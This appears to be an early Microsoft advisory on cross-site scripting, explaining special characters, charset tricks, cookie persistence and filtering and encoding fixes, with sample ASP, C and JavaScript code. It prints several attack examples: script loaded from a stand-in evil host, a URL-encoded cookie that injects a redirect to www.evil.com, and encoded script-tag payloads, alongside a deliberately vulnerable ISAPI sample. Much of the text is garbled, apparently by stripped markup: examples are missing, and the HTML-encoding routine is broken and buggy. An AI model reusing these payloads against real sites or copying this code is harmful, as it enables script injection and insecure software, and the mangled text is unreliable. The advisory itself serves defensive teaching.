Cross-site Scripting Overview Originally Posted: February 2, 2000 David Ross - Microsoft Ivan Brugiolo - Microsoft John Coates - Microsoft Microsoft - Microsoft Michael Roe - Microsoft Research Abstract A security issue has come to Microsoft’s attention that we refer to as “cross-site scripting”. This is not an entirely new issue – elements of the information we present have been known for some time within the software development community. However, the overall scope of the issue is larger than previously understood, both in terms of the breadth of the problem and the risk that it presents. It is important to explore the issue more comprehensively due to the current growth and complexity of the Web. 1. The Problem Web pages contain both text and HTML markup that is generated by the server and interpreted by the client. Servers that generate static pages have full control over how the client will interpret the pages the server sends. However, servers that generate dynamic pages do not have control over how their output is interpreted by the client. The heart of the cross-site scripting security issue is that if untrusted content can be introduced into a dynamic page, neither the server nor the client have enough information at hand to recognize that this has happened and take protective actions. In HTML, to distinguish text from markup, some characters are treated specially. The grammar of HTML determines the significance of “special” characters—different characters are special at different points in the document. For example, the less-than sign (<) typically indicates the beginning of an HTML tag. Tags can either affect the formatting of the page or introduce a program that the browser executes (e.g. the ”> http://www.microsoft.com Note the following about this example: It disguises the link as a link to http://www.microsoft.com. It can easily be included in an HTML mail message. In this case, malicious script is not provided inline, it is provided by www.[evil].com. This script remains under the control of the malicious author of this particular exploit. He or she can update or remove the exploit code after the fact. To understand what happens when the user clicks this link, it is easiest to consider a normal case first. If http://www.[foo].com/form.asp were a search page and the field were “beanbags”, the effect of clicking the link would be to perform a search on www.foo.com for the word “beanbags”. If the search yielded no hits, the page returned to the client might display “I can’t find any information on beanbags.” In this case, however, we aren’t searching for beanbags, we are searching for "". If www.foo.com does not filter the characters that can be submitted within the search form, this text would be inserted into the results page. When processed by the client it would load a script from www.[evil].com and cause it to execute on the client within the http://www.[foo].com domain. 2. Blocking cross-domain form submissions Thus far, we have focused on the role of unfiltered special characters in this attack. However, there is an additional prerequisite to a successful attack – it can only succeed if the victim site also allows cross-domain form submissions. This offers web site developers an additional method of blocking the vulnerability. 2.1 The problem with HTTP Referer HTTP includes a header field called “referer”. When a browser follows a link, the referer field can contain the URL of the page that the link came from. The referer field can also be present when a form is submitted. Web servers could check the referer field when receiving a filled-in form, and reject it if it didn’t come from the right place. If this is done, the attack would fail, regardless of whether special characters are filtered or not. Unfortunately, this can only be done at the risk of blocking some legitimate form submissions. The referer field is an optional field, so it is possible that rejecting forms with blank referer fields would cause the Web site to stop supporting certain browsers. Even if a browser does support the referer field, there are cases in which it could legitimately be cleared: Sometimes, the link comes from somewhere that doesn’t have a URL, such as an email message or the user’s bookmarks file. In this case the referer field isn’t present, because there is no value it could contain. In some situations, browsers deliberately clear the referer field. For example, if a user navigates from a secure (HTTPS) page to an unsecure (HTTP) page, many browsers will clear the referer field. This is done because confidential information such as credit card numbers are sometimes contained the URLs of HTTPS pages, and clearing the referer field ensures that an onward Web page could not recover it. Although the rationale for doing this is sound, it would enable a malicious user to mask the origination point of an attack by hosting it on an HTTPS page. 3. Which characters are special? Which characters are “special”, in the sense that they should not be inserted into Web pages? This can be determined from the HTML specification. However, many Web browsers try to correct for common errors in HTML. As a result, browsers sometimes treat characters as special when, according to the specification, they aren’t. In addition, the set of special characters depends on the context: In the content of a block-level element (e.g. in the middle of a paragraph of text), “<” and “&” are special. The former is special because it introduces a tag; the latter is special because it introduces a character entity. Some browsers treat “>” as special, on the assumption that the author of the page really meant to put in an opening “<”, but omitted it in error. Inside an attribute value enclosed with double quotes, double quotes are special because they mark the end of the attribute value. “&” is special when used in conjunction with some attributes because it introduces a character entity. Attribute values can also be enclosed with single quote, which makes single quote special. The enclosing quotes can be omitted entirely, in which case white-space characters such as space and tab become special. Some Web servers insert text into the middle of URLs. For example, a search engine might provide a link within the results page that the user can click to re-run the search. This can be implemented by encoding the search query inside the URL. When this is done, it introduces additional special characters: Space, tab and new line are special because they mark the end of the URL. "&" is special because it introduces a character entity. Non-ASCII characters (e.g. everything above 128 in the ISO 8859-1 encoding) aren’t allowed in URLs, so they are all special here. 3.1 The problem with character encodings Many Web pages leave the character encoding (“charset” parameter in HTTP) undefined. In earlier versions of HTML and HTTP, the character encoding was supposed to default to ISO 8859-1 if it wasn’t defined. In fact, many browsers had a different default character encoding, so it was not possible to rely on the default being ISO 8859-1. HTML version 4 legitimizes this; with HTML 4, if the character encoding isn’t specified, any character encoding can be used. But if the Web server doesn’t know which character encoding is in use, it can’t tell which characters are special. Web pages with unspecified character encodings work most of the time because most character sets assign the same characters to byte values below 128. But which of the values above 128 are special? Some 16-bit character encodings have additional multi-byte representations for special characters such as “<”. Some browsers recognize these alternative encodings, and act on them. This is “correct” behavior, but it makes this attack much harder to prevent. Which byte sequences will cause the browser to start executing code? The server simply doesn’t know. We have constructed a version of an attack using the UTF-7 encoding. UTF-7 provides alternative encodings for “<” and “>”, and several popular browsers recognize these as the start and end of a tag. This is not a bug in those browsers. If the character encoding really is UTF-7, then this is correct behavior. The problem is that it is possible to get into a situation where the browser and the server disagree on the encoding. Web servers should set the character set, then make sure that the data they insert is free from byte sequences that are special in the specified encoding. 4. What should Web site designers do? Any data inserted into an output stream originating from a server is presented as originating from it – including plain text. In light of this fact, web developers should reevaluate whether their sites will send untrusted text as part of an output stream, regardless of filtering. As an example, imagine that your Web site displays “Hello, David!” in response to http://www.microsoft.com/name.asp?name=David. It might be acceptable to sacrifice this dynamic response with a hard-coded response in this case. “Hello, User!” is certainly better than “Hello, Loser!” – especially when it is your site insulting the user. Filtering must be performed on any code that dynamically generates content based on untrusted input. This includes ASP code, CGI, and ISAPI filters. The first solution is to filter some or all of the following characters from all input to server-side script: < > “ ‘ % ; ) ( & + It is obvious that without < and >, basic cross-site scripting using a script tag is impossible. In addition, basic HTML is prevented from being inadvertently inserted into the output stream. The Internet Explorer Security Team has uncovered situations where cross-site scripting takes place within an HTML tag itself. For example: hello In this case it would be possible to use an exploit string similar to this: “ [event]=’malicious script’ The first double-quote closes the containing HREF attribute, and then the event allows script to execute when fired. To prevent such scenarios, single and double quotes should be filtered. The % character must be filtered from input anywhere parameters encoded with HTTP escape sequences are decoded by server-side code. During the course of its research, the Internet Explorer Security Team discovered several public web sites in which this was done; others almost certainly exist. The % character must be filtered if input such as “%68%65%6C%6C%6F” becomes “hello” when appearing on the Web page in question. The semicolon and parenthesis should be filtered in situations where text could be inserted directly into a preexisting script tag. It is not necessary to filter these characters if it can be determined that this condition will never occur on pages affected by the filter. No current exploits rely on the ampersand, however the Internet Explorer Security Team believes that this character may be useful in future exploits. Conservative Web page authors should filter this character out if possible. If a Web page uses the UTF-7 character encoding, there are several different strings which will act as a '<' character and start an HTML tag; all of these strings start with '+'. If a Web page does not specify its encoding, then an attacker can trick the browser into using UTF-7. To protect against this, either add '+' to the list of special characters which must be filtered out, or explicitly set the page's encoding to something other than UTF-7 (e.g. ISO-8859-1). It is important to note that individual situations may warrant the filtering of additional characters or strings. As an example, a particular server-side script that converts any ! characters in input to “ characters in output might require additional filtering. One problem with input filtering is that the filtered characters may actually be required input to server-side script. Output filtering is a logical alternative, although it is more complex – input for a particular page may be passed through a central filter, whereas output code is usually present throughout a server-side script. The following characters must be filtered from output: < > “ ‘ ; ) ( & + It is not necessary to filter the percent sign from output. 5. Making the attack persistent HTML cookies allow a browser to keep persistent state. A Web site asks the browser to set a cookie, and the browser responds with the cookie whenever the user returns to the site. We have been able to use this facility to make this attack persistent. Suppose that the Web site has a form that the user can fill in to set their preferences. When they submit the form, the Web site sends the contents back to the browser as a cookie. When the user subsequently accesses the site, their browser sends the cookie and the Web site uses its value to modify how the page is displayed. This is a perfectly normal way of making a Web site customizable by the user. However, this attack can be used to insert code into the user’s preferences, with the result that the browser will execute that code every time the user returns to the site. Once script has been inserted anywhere within a domain, cookies from that domain can be read and altered. By tying a cross-site scripting bug to a cookie, the exploit may persist indefinitely. With the concept of persistence, cross-site scripting almost allows for a virus-like scenario. Although an initial exploit may happen only once, the Web browser is “infected” from that point on. The one thing missing from this picture is the self-replicating nature of a virus. Fortunately, sites that might serve as the conduit for self-replicating cross-site scripting – Web e-mail systems and BBSs, for instance – also are, in general, well attuned to the importance of filtering inputs. 6. The Implications of Single Sign-on Many Web sites provide a “single sign-on” facility, so that the user only need enter their username and password once; they can then view as many pages from the site as they wish without further authentication dialogues. Single sign-on has a number of benefits with respect to usability and user experience. However, single sign-on also can make this attack easier to carry out. Without single sign-on, the user would see an authentication dialogue each time their browser attempted to access additional resources; this could provide a tip-off to the presence of a script running. However, under a single sign-on scenario, a script injected by this attack could do its work with less chance of the user noticing. The situation where a cross-site scripting attack is attempted within an intranet is worth notice. Many intranets allow transparent authentication to be performed based on user login credentials. A user checking their pay stub data online often is not required to “log on” to the Web site providing that data, simply because they are already logged in to the intranet as a whole. This environment is obviously conducive to cross-site scripting attacks. 7. Similarities to other security problems In some ways, this class of attack is similar to the “stack overwriting” class of attack. In both cases, a programming error leads to untrusted data being executed as code. With stack overwriting, the programming error is a failure to check the length of the data. With this attack, the programming error is a failure to check for the presence of special characters within the data. Both of these are pervasive problems. They are not isolated bugs that can be fixed with a change to one program, but a common error that occurs in many different programs. This attack is also related to the attacks against Unix shell scripts. These attacks put special characters in variables, or change which characters are special, in order to cause a program supplied by the attacker to execute in the wrong security context (e.g. running as root rather than running as the attacker). The version of this attack that changes CHARSET to make new characters special is similar to the shell script attack which changes IFS to make new characters special. Stack overflow attacks and shell script attacks have well publicized, and most programmers know that they should be careful to avoid them. We have shown that dynamically generated HTML can be just as dangerous. 8. Conclusions Cross-site scripting is not a new issue in the Web development community. Many Web developers understand the need to filter data. However, the scope of this problem appears to be growing in parallel with the growth of the Web as a whole. One lesson to be learned by cross-site scripting is that the omission of a sanity check on input data can have unexpected security implications. Failure to check the lengths of strings enables stack-overwriting attacks. Failure to check for the presence of special characters leads to the attack we have described. DISCLAIMER This material is provided for informational purposes only on an AS-IS basis without warranty of any kind. MICROSOFT DISCLAIMS ALL WARRANTIES, WHETHER EXPRESS, IMPLIED, OR STATUTORY, INCLUDING THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, TITLE AND NONINFRINGEMENT. REFERENCES [1] “HTML 4.01 Specification”, World Wide Web Consortium, 24 December 1999. [2] “RFC 2616 : Hypertext transfer protocol – HTTP/1.1”, Tim Berners-Lee et al, June 1999. Appendix A Sample of dynamically constructed output Attribute-value sample This is an example of how a persisted script attack may be reused. Sometimes a Web page allows the user to set some preferences, like the color of the background, which is coded in HTML in a form similar to: This HTML code can be dynamically generated by a server side script page: <% Response.Write(""); %> but a replaced cookie may lead to an output like this: that brings the user directly to an other Web site. The cookie is invisible to the user, since it travels in the http headers, and never appear in the Web page. The http header for this example is: Cookie: %22+onload%3D%27window%2Elocation%3D %22http%3A%2F%2Fwww%2Eevil%2Ecom%22%3B%27 Another example that uses the http GET verb is a dynamically built anchor tag, like this: click-me This anchor tag represents a common scenario with search pages that offers the opportunity to refine certain search parameters. The victim's browser can be easily induced to navigate this URL. This URL can be build with a server side script like this: <% var BaserUrl = "http://www.foo.com/search2.asp? searchagain=";Response.Write("click-me" ) %> Now, a client input like this: Search for FooBar may induce the server to write: click-me where the attacker added to the HTML page code that uses the DOM of the HTML page to redirect data in some form to the attacker Web site. Script inserted in the output An example of the POST attack has a common scenario in the sign-on Web pages. A welcome output like this: Hello visitor John Doe can be generated on the server with a script like this: <% Response.Write("Hello visitor " + Request.Form("UserName") + ""); %> but a modified html form can induce the server to send back this string instead: Hello visitor John Doe A modified form can be the consequence of a previous cross-site script, when, for instance, an evil script has modified the data in the form using the HTML DOM. Script inserted into the script This is another example of the GET attack, where a dynamically built page contains dynamically build script like this: can be forced to run arbitrary script code if it is implemented in this way: In fact, an untrusted input written on the output stream may lead to a script like this: Data interpreted as script because of charset If the charset is set to non ISO8859-1, than the output stream allows multiple ways to insert untrusted scripting code. Assume having this html page where the string "Japanese_Customer" comes from the user input: Hello Japanese_Customer and the page is implemented as Hello <% Response.Write(Request.Form("UserName")) %> The risk is exactly the one exposed before, but this time there are multiple ways to encode the client-side script code. How to prevent cross-site scripting Define a charset First of all, it's a good practice to define a charset for the page, so there is no ambiguity on how the browser will interpret the stream coming from the server: Filter the input The input of a Web server is whatever comes through an http request. An HTML request comes in this form: POST /myscript.cgi?UserName=%3Cscript%3Ealert%28% 22hello%22+%29%3C%2Fscript%3E HTTP/1.0 Cookie: UserColor=%3Cscript%3Ealert%28% 22hello%22%29%3B%3C%2Fscript%3E URLEncode=%3Cscript%3Ealert%28%22window.location% 3A+%22+%2B+window.location%29%3C%2Fscript%3E We have chosen to give an example of all the possible source of data from a user, in a simplified way. The query_string is UserName=%3Cscript%3Ealert%28% 22hello%22+%29%3C%2Fscript%3E The Cookie is UserColor=%3Cscript%3Ealert%28% 22hello%22%29%3B%3C%2Fscript%3E The posted data is URLEncode=%3Cscript%3Ealert%28% 22window.location%3A+%22+%2B+window. location%29%3C%2Fscript%3E The posted data is not present if the verb is GET, and usually the query_string is not present if the verb is POST. Other sources of input in the request are pieces of the URL: The PATH_INFO part of the URL appended after the script name: GET /cgi_bin/CoolScript.pl/path_info%3cscript% 3e%3c%2fscript%3e?QUERY=STRING HTTP/1.0 The URL itself: GET /download_files/inexistent_file_name %3cscript%3e%3c%2fscript%3e HTTP/1.0 These parts should be treated as the query_string as far as filtering and encoding is concerned. Most of the sources of input come in URL-Encoded. The posted data comes in URL-encoded if the Content-Type header is set to application/x-www-form-urlencoded, but file uploads and binary read of the input stream by the server may lead to get the raw data. The first task to accomplish on the input is to URL-Decode the strings (if this is their transmission format), so it's possible to identify the characters in their native form. Granted that the bad characters are < > " ' % ; ) ( & +, a drastic way to avoid the short circuit of untrusted user input to the output stream is to systematically remove these characters from the input. A sample filter function, that strips certain characters from a generic input, is shown: BYTE IsBadChar[] = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0xFF,0x00,0x00,0xFF,0xFF,0xFF, 0xFF,0xFF,0x00,0xFF,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0xFF,0xFF,0x00,0xFF,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; DWORD FilterBuffer(BYTE * pString,DWORD cChLen){ BYTE * pBad = pString; BYTE * pGood = pString; DWORD i=0; if (!pString) return 0; for (i=0;pBad[i];i++){ if (!IsBadChar[pBad[i]]) *pGood++ = pBad[i]; }; return pGood-pString; } The equivalent of this function may be written in JavaScript: function RemoveBad(InStr){ InStr = InStr.replace(/\/g,""); InStr = InStr.replace(/\"/g,""); InStr = InStr.replace(/\'/g,""); InStr = InStr.replace(/\%/g,""); InStr = InStr.replace(/\;/g,""); InStr = InStr.replace(/\(/g,""); InStr = InStr.replace(/\)/g,""); InStr = InStr.replace(/\&/g,""); InStr = InStr.replace(/\+/g,""); return InStr; } It could be a safe practice to run this function on an untrusted input, before storing the input for a later reuse. <% Session("StoredPreferency") = RemoveBad(Request. Cookies("UserColor"));var TempStr = RemoveBad(Request. QueryString("UserName"));var SQLString = "INSERT TableName VALUES ('" + RemoveBad(Request.Form ("UserName")) + "')"; %> Encode the output In the output stream the Web developer can write data coming directly from the user input (the query_string, the data in the body after a POST, the Cookies) or data persisted somehow without having been validated. Examples of this second case are: session-wide variable (most Web servers has facilities to maintain data for all the time the socket connection is kept opened), temporary files, databases. Before inserting this un-validated data to the output stream, the Web developer must encode the output, so the client-side parser is not forced to interpret the lines in the HTML page as script. Any un-validated string that is written on the output should be HTML-encoded. The HTML-encoding operation consist in replacing the characters < > & " with the strings < > & " Any untrusted input written in a tag should be URL-encoded. The URL-encoding operation consists in replacing most of the printable and non-printable characters in the ASCII set with their hexadecimal representation preceded by a % character. In this encoding the " (quote) becomes a %22. The previous examples of server-side code rewritten to take in account the right encoding are: <% Response.Write(""); %> <% var BaserUrl = "http://www.foo.com/ search2.asp?searchagain=";Response. Write("click-me" ); %> <% Response.Write("Hello visitor " + Server.HTMLEncode(Request.Form("UserName")) + ""); %> The examples used so far have shown the ASP way of dealing with client input and writing client output, but the same concepts may be illustrated in other technologies. Here is a simple ISAPI extension that has the same short-circuit behavior of user input to server output: DWORD WINAPI HttpExtensionProc( LPEXTENSION_CONTROL_BLOCK lpECB ){ lpECB->dwHttpStatusCode = HTTP_STATUS_OK; // Assume querystring UserName=AAAAAAAAA char * pStr = strstr("UserName=",lpECB->lpszQuerySyting); char pTmpBuff[4096]; DWORD dwLen=0; if (pStr){ pStr+=(sizeof("UserName=")-1); dwLen += wsprintf(pTmpBuff,"Hello visitor %s",pStr); } else { dwLen += wsprintf(pTmpBuff,"Bad QueryString\r\n"); } char pTmpBuff2[512]; wsprintfA(pTmpBuff2,"Content-Type: text/html\r\ nContent Length: %d\r\n\r\n",dwLen); bRet=lpECB->ServerSupportFunction(lpECB->ConnID, HSE_REQ_SEND_RESPONSE_HEADER, NULL, //optional 0, (DWORD *)pTmpBuff2); bRet=lpECB->WriteClient(lpECB->ConnID, pTmpBuff, (DWORD *)&dwLen, HSE_IO_SYNC); return HSE_STATUS_SUCCESS; } To fix this it is necessary to write a function that HTML-encodes a generic string /* call free on the pointer returned*/ void HTMLEncode(char * pStrIn, char ** ppStrOut){ char * pTmp = pStrIn; DWORD i; DWORD TotLen=0; for (i=0;pTmp[i];i++){ switch (pTmp[i]){ case '<': case '>': TotLen+=4; break; case '&': TotLen+=5; break; case '\"': TotLen+=6; break; default: TotLen++; break; } }; *ppStrOut = (char *)malloc(TotLen+1); pTmp = *ppStrOut; for (i=0;pStrIn[i];i++){ switch (pStrIn[i]){ case '<': memcpy((void *)pTmp,"<",4); pTmp+=4; break; case '>': memcpy((void *)pTmp,">",4); pTmp+=4; break; case '&': memcpy((void *)pTmp,"&",5); pTmp+=5; break; case '\"': memcpy((void *)pTmp,""",6); pTmp+=6; default: *pTmp=pStrIn[i]; pTmp++; } } *pTmp = 0; } And the ISAPI above can be fixed using this fragment instead of the corresponding line in the previous example char * pEncoded; HTMLEncode(pStr,&pEncoded); dwLen += wsprintf(pTmpBuff, "Hello visitor %s",pEncoded); free(pEncoded); Last updated Wednesday, February 2, 2000 © 2000 Microsoft Corporation. All rights reserved. Terms of use.